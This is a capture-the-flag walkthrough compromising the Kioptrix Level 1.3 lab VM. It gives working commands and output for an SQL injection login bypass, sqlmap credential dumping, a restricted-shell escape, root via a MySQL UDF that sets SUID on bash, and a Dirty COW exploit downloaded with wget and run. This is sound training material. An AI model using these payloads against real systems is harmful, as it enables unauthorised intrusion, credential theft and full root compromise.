VM : Kioptrix Level 1.3 (#4)
Download link : https://download.vulnhub.com/kioptrix/Kioptrix4_vmware.rar
VM HOST : VMware Workstation/Player
Network : Briged mode with DHCP
Scanning Network to identify running vm :
Scanning Target :
Scanning web server with dirb
Scan with dirsearch :
The above creds does not work on Member Login page
SQL Vulnerability : By fuzzing inputs of Member Login page, we find that there is an SQL vulnerability on login password field, payload "Name:`john` and password:`' or 1='1 --+` user logged in and auth john/MyNameIsJohn is showed.
Using sqlmap to dump all the data from database :
john: MyNameIsJohn
robert:ADGAdsafdfwt4gadfga==
With the above creds we can get access to the ssh server, which gives us a restricted shell.
Breaking out Restricted Shells :
I tried all methods from these listed posts, but nothing works in this case.
https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
https://www.hackingarticles.in/multiple-methods-to-bypass-restricted-shell/
https://www.metahackers.pro/breakout-of-restricted-shell/
https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/
But when giving random inputs i get the error for input `echo $)`
Privilege Escalation :
Enumerating the system :
Enumerating the Operating system and kernel version :
Search for application and services with root privilege :
Method 1 :
The mysql deamon can running with root privilege can be used to get a root shell
Method 2 :
The kernel version is 2.6.24, so we can use the kernel exploit (dirty cow vulnerability) to escalate privilege.
Exploit link : https://www.exploit-db.com/exploits/40839
The above exploit creates a new user 'firefart' with root privilege. Also note that the kioptrix1.4 VM does not have gcc compiler, so compole the binary within 32bit architecture, downlaod it on the vm then execute it. Compilation of binary :
Some Usefull privilege escalation techniques :
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://payatu.com/guide-linux-privilege-escalation
https://gtfobins.github.io/
https://www.prodefence.org/beroot-for-linux-privilege-escalation-project/ https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
Download link : https://download.vulnhub.com/kioptrix/Kioptrix4_vmware.rar
VM HOST : VMware Workstation/Player
Network : Briged mode with DHCP
Scanning Network to identify running vm :
$ nmap -sP 192.168.1.0/24
Starting Nmap 7.60 ( https://nmap.org ) at 2020-05-15 08:12 UTC
Nmap scan report for _gateway (192.168.1.1)
Host is up (0.0028s latency).
Nmap scan report for 192.168.1.3
Host is up (0.0021s latency).
Nmap scan report for 192.168.1.6
Host is up (0.076s latency).
Nmap scan report for 192.168.1.8
Host is up (0.0021s latency).
Nmap scan report for 192.168.1.12
Host is up (0.010s latency).
Nmap scan report for avm (192.168.1.14)
Host is up (0.00067s latency).
Nmap scan report for 192.168.1.15
Host is up (0.075s latency).
Nmap scan report for 192.168.1.100
Host is up (0.0024s latency).
Nmap done: 256 IP addresses (8 hosts up) scanned in 3.03 seconds
Scanning Target :
$ nmap -A -Pn 192.168.1.15 -oN nmap.scan
# Nmap 7.60 scan initiated Fri May 15 08:22:12 2020 as: nmap -A -Pn -oN nmap.scan 192.168.1.15
Nmap scan report for 192.168.1.15
Host is up (0.017s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -24d02h55m48s, deviation: 0s, median: -24d02h55m48s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: Kioptrix4
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: Kioptrix4.localdomain
|_ System time: 2020-04-21T01:28:29-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 15 08:24:19 2020 -- 1 IP address (1 host up) scanned in 127.09 seconds
Scanning web server with dirb
$ dirb http://192.168.1.15 | tee dirb.sacn
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri May 15 08:40:56 2020
URL_BASE: http://192.168.1.15/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.15/ ----
+ http://192.168.1.15/cgi-bin/ (CODE:403|SIZE:327)
==> DIRECTORY: http://192.168.1.15/images/
+ http://192.168.1.15/index (CODE:200|SIZE:1255)
+ http://192.168.1.15/index.php (CODE:200|SIZE:1255)
==> DIRECTORY: http://192.168.1.15/john/
+ http://192.168.1.15/logout (CODE:302|SIZE:0)
+ http://192.168.1.15/member (CODE:302|SIZE:220)
+ http://192.168.1.15/server-status (CODE:403|SIZE:332)
---- Entering directory: http://192.168.1.15/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Fri May 15 08:41:15 2020
$ nikto -host 192.168.1.15 | tee nikto.scan
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 192.168.1.15
+ Target Hostname: 192.168.1.15
+ Target Port: 80
+ Start Time: 2020-05-15 08:44:06 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.4.4)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 98933, size: 5108, mtime: 0x438c0358aae80
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie PHPSESSID created without the httponly flag
+ 6544 items checked: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2020-05-15 08:44:46 (GMT0) (40 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested $ enum4linux.pl 192.168.1.15 | tee enum4linx.scan
WARNING: polenum.py is not in your path. Check that package is installed and your PATH is sane.
WARNING: ldapsearch is not in your path. Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri May 15 09:35:46 2020
==========================
| Target Information |
==========================
Target ........... 192.168.1.15
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
...............
...............
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)
=============================================
| Getting printer info for 192.168.1.15 |
=============================================
mkdir failed on directory /var/run/samba/msg.lock: Permission denied
No printers returned.
enum4linux complete on Fri May 15 09:37:03 2020
$ cat enum4linx.scan | grep Account
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody Name: nobody Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert Name: ,,, Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root Name: root Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john Name: ,,, Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret Name: loneferret,,, Desc: (null)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
Scan with dirsearch :
$ dirsearch.py -u http://192.168.1.15 -e php,asp,aspx,jsp,html,zip,jar,sql --plain-text-report=
_|. _ _ _ _ _ _|_ v0.3.
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, html, zip, jar, sql | HTTP method: get | Threads: 10 | Wordlist size: 8679
Error Log: /home/ajay/tools/dirsearch/logs/errors-20-05-15_08-47-32.log
Target: http://192.168.1.15
[08:47:32] Starting:
[08:47:38] 403 - 323B - /.hta [08:47:38] 403 - 330B - /.ht_wsr.txt
.....
.....
[08:49:57] 302 - 220B - /member/login.html -> index.php
[08:49:57] 302 - 220B - /member/login.jar -> index.php
[08:49:57] 302 - 220B - /member/login.sql -> index.php
[08:49:57] 302 - 220B - /member/login.py -> index.php
[08:49:57] 302 - 220B - /member/login.rb -> index.php
[08:49:57] 302 - 220B - /member/logon -> index.php
[08:49:57] 302 - 220B - /member/signin -> index.php
[08:50:31] 403 - 333B - /server-status/
[08:50:31] 403 - 332B - /server-status
Task Completed
$ cat dirsearchReport | grep 200
200 109B http://192.168.1.15:80/checklogin.php
200 109B http://192.168.1.15:80/checklogin
200 298B http://192.168.1.15:80/database.sql
200 1KB http://192.168.1.15:80/index
200 1KB http://192.168.1.15:80/index.php
200 1KB http://192.168.1.15:80/index.php/login/
The above creds does not work on Member Login page
SQL Vulnerability : By fuzzing inputs of Member Login page, we find that there is an SQL vulnerability on login password field, payload "Name:`john` and password:`' or 1='1 --+` user logged in and auth john/MyNameIsJohn is showed.
$ sqlmap -u "http://192.168.1.15/checklogin.php" --data="myusername=john&mypassword=12345&submit"
$ sqlmap -u "http://192.168.1.15/checklogin.php" --data="myusername=john&mypassword=12345&submit=Login" --dbs
sqlmap got a 302 redirect to 'http://192.168.1.15:80/login_success.php?username=john'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
[*] information_schema
[*] members
[*] mysql
$ sqlmap -u "http://192.168.1.15/checklogin.php" --data="myusername=john&mypassword=12345&submit=Login" --tables -D members
sqlmap got a 302 redirect to 'http://192.168.1.15:80/login_success.php?username=john'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
Database: members
[1 table]
+---------+
| members |
+---------+
$ sqlmap -u "http://192.168.1.15/checklogin.php" --data="myusername=john&mypassword=12345&submit=Login" --columns -D members -T members
sqlmap got a 302 redirect to 'http://192.168.1.15:80/login_success.php?username=john'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
Database: members
Table: members
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(4) |
| password | varchar(65) |
| username | varchar(65) |
+----------+-------------+
$ sqlmap -u "http://192.168.1.15/checklogin.php" --data="myusername=john&mypassword=12345&submit=Login" --dump -D members -T members
sqlmap got a 302 redirect to 'http://192.168.1.15:80/login_success.php?username=john'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
[16:12:12] [INFO] retrieved: 1
[16:12:13] [INFO] retrieved: MyNameIsJohn
[16:12:25] [INFO] retrieved: john
[16:12:29] [INFO] retrieved: 2
[16:12:30] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[16:12:48] [INFO] retrieved: robert
Database: members
Table: members
[2 entries]
+----+----------+-----------------------+
| id | username | password |
+----+----------+-----------------------+
| 1 | john | MyNameIsJohn |
| 2 | robert | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+
john: MyNameIsJohn
robert:ADGAdsafdfwt4gadfga==
With the above creds we can get access to the ssh server, which gives us a restricted shell.
$ ssh john@192.168.1.15
john@192.168.1.15's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$
john:~$ help
cd clear echo exit help ll lpath ls
john:~$ ls -al
total 28
drwxr-xr-x 2 john john 4096 2012-02-04 18:39 .
drwxr-xr-x 5 root root 4096 2012-02-04 18:05 ..
-rw------- 1 john john 1133 2020-04-21 01:08 .bash_history
-rw-r--r-- 1 john john 220 2012-02-04 18:04 .bash_logout
-rw-r--r-- 1 john john 2940 2012-02-04 18:04 .bashrc
-rw-r--r-- 1 john john 3105 2020-04-21 01:08 .lhistory
-rw-r--r-- 1 john john 586 2012-02-04 18:04 .profile
john:~$ pwd
*** unknown command: pwd
ohn:~$ cat /etc/passwd
*** unknown command: cat
john:~$ cd ..
*** forbidden path -> "/home/"
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.
john:~$ cd ..
*** forbidden path -> "/home/"
*** Kicked out
Connection to 192.168.1.15 closed.
Breaking out Restricted Shells :
I tried all methods from these listed posts, but nothing works in this case.
https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
https://www.hackingarticles.in/multiple-methods-to-bypass-restricted-shell/
https://www.metahackers.pro/breakout-of-restricted-shell/
https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/
But when giving random inputs i get the error for input `echo $)`
john:~$ echo $)
/bin/sh: Syntax error: ")" unexpected
Traceback (most recent call last):
File "/bin/kshell", line 27, in <module>
lshell.main()
File "/usr/lib/python2.5/site-packages/lshell.py", line 1219, in main
cli.cmdloop()
File "/usr/lib/python2.5/site-packages/lshell.py", line 410, in cmdloop
stop = self.onecmd(line)
File "/usr/lib/python2.5/site-packages/lshell.py", line 531, in onecmd
func = getattr(self, 'do_' + cmd)
File "/usr/lib/python2.5/site-packages/lshell.py", line 134, in __getattr__
if self.check_path(self.g_line) == 1:
File "/usr/lib/python2.5/site-packages/lshell.py", line 327, in check_path
item = cout.readlines()[0].split(' ')[0].strip()
IndexError: list index out of range
Connection to 192.168.1.15 closed.
john:~$ os.system("/bin/sh")
*** unknown command: os.system("/bin/sh")
john:~$
john:~$ ls os.system("/bin/bash")
bash-3.2$
bash-3.2$ pwd
/home/john
bash-3.2$
bash-3.2$ whoami
john
bash-3.2$ sudo su
[sudo] password for john:
john is not in the sudoers file. This incident will be reported.
bash-3.2$
Privilege Escalation :
Enumerating the system :
Enumerating the Operating system and kernel version :
bash-3.2$ cat /etc/issue
Welcome to LigGoat Security Server
bash-3.2$ cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS"
bash-3.2$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
// sticky bit permissions
$ find / -perm -1000 -type d 2>/dev/null
/var/spool/samba
/var/spool/cron/atjobs
/var/spool/cron/atspool
/var/spool/cron/crontabs
/var/lib/php5
/var/lib/samba/usershares
/var/tmp
/var/lock
/dev/shm
/tmp
// GUID permission
$ find / -perm -g=s -type f 2>/dev/null
/usr/bin/wall
/usr/bin/expiry
/usr/bin/crontab
/usr/bin/bsd-write
/usr/bin/mlocate
/usr/bin/at
/usr/bin/chage
/usr/bin/ssh-agent
/usr/sbin/uuidd
/sbin/unix_chkpwd
// SUID permission
/usr/lib/apache2/suexec
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/newgrp
/usr/bin/sudoedit
/usr/bin/chfn
/usr/bin/arping
/usr/bin/gpasswd
/usr/bin/mtr
/usr/bin/passwd
/usr/bin/at
/usr/sbin/pppd
/usr/sbin/uuidd
/lib/dhcp3-client/call-dhclient-script
/bin/mount
/bin/ping6
/bin/fusermount
/bin/su
/bin/ping
/bin/umount
/bin/bash
/sbin/umount.cifs
/sbin/mount.cifs
Search for application and services with root privilege :
bash-3.2$ ps aux | grep root
root 4623 0.0 0.0 1716 488 tty5 Ss+ 14:20 0:00 /sbin/getty 38400 tty5
root 4627 0.0 0.0 1716 488 tty2 Ss+ 14:20 0:00 /sbin/getty 38400 tty2
root 4629 0.0 0.0 1716 484 tty3 Ss+ 14:20 0:00 /sbin/getty 38400 tty3
root 4632 0.0 0.0 1716 488 tty6 Ss+ 14:20 0:00 /sbin/getty 38400 tty6
root 4690 0.0 0.0 1872 544 ? S 14:20 0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/km
root 4711 0.0 0.0 5316 984 ? Ss 14:20 0:00 /usr/sbin/sshd
root 4767 0.0 0.0 1772 524 ? S 14:20 0:00 /bin/sh /usr/bin/mysqld_safe
root 4809 0.0 1.5 126988 16232 ? Sl 14:20 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/
root 4811 0.0 0.0 1700 556 ? S 14:20 0:00 logger -p daemon.err -t mysqld_safe -i -t mysql
root 4884 0.0 0.1 6528 1328 ? Ss 14:20 0:00 /usr/sbin/nmbd -D
bash-3.2$ cd /var/www
bash-3.2$ ls
checklogin.php5database.sql images index.php john login_success.php logout.php member.php robert
bash-3.2$ cat checklogin.php | head -n15
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");
// Define $myusername and $mypassword
$myusername=$_POST['myusername'];
$mypassword=$_POST['mypassword'];
bash-3.2$
bash-3.2$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 7
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| members |
| mysql |
+--------------------+
3 rows in set (0.00 sec)
mysql>
Method 1 :
The mysql deamon can running with root privilege can be used to get a root shell
mysql> use mysql;
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
mysql> select sys_exec('chmod u+s /bin/bash');
mysql> quit
bash-3.2$ ls -al /bin/bash
-rwsr-xr-x 1 root root 702160 2008-05-12 14:33 /bin/bash
bash-3.2$ bash -p
bash-3.2# whoami
root
cd /root
bash-3.2# ls
congrats.txt lshell-0.9.12
bash-3.2# cat congrats.txt
Congratulations!
You've got root.
There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.
It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.
If you haven't already, check out the other VMs available on:
www.kioptrix.com
Thanks for playing,
loneferret
Method 2 :
The kernel version is 2.6.24, so we can use the kernel exploit (dirty cow vulnerability) to escalate privilege.
Exploit link : https://www.exploit-db.com/exploits/40839
The above exploit creates a new user 'firefart' with root privilege. Also note that the kioptrix1.4 VM does not have gcc compiler, so compole the binary within 32bit architecture, downlaod it on the vm then execute it. Compilation of binary :
$ gcc -pthread exploit.c -o exploit -lcrypt
bash-3.2$ cd /tmp
bash-3.2$ wget http://192.168.1.8:8000/dirty_cow
bash-3.2$ ./dirty_cow
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password:
Complete line:
firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash
mmap: b7f0e000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '12345'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '12345'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
bash-3.2$ su firefart
Password:
Failed to add entry for user firefart.
firefart@Kioptrix4:/home/john# whoami
firefart
firefart@Kioptrix4:/home/john# cd /root
firefart@Kioptrix4:~# ls
congrats.txt lshell-0.9.12
firefart@Kioptrix4:~# cat congrats.txt
Congratulations!
You've got root.
There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.
It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.
If you haven't already, check out the other VMs available on:
www.kioptrix.com
Thanks for playing,
loneferret
firefart@Kioptrix4:~#
Some Usefull privilege escalation techniques :
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://payatu.com/guide-linux-privilege-escalation
https://gtfobins.github.io/
https://www.prodefence.org/beroot-for-linux-privilege-escalation-project/ https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md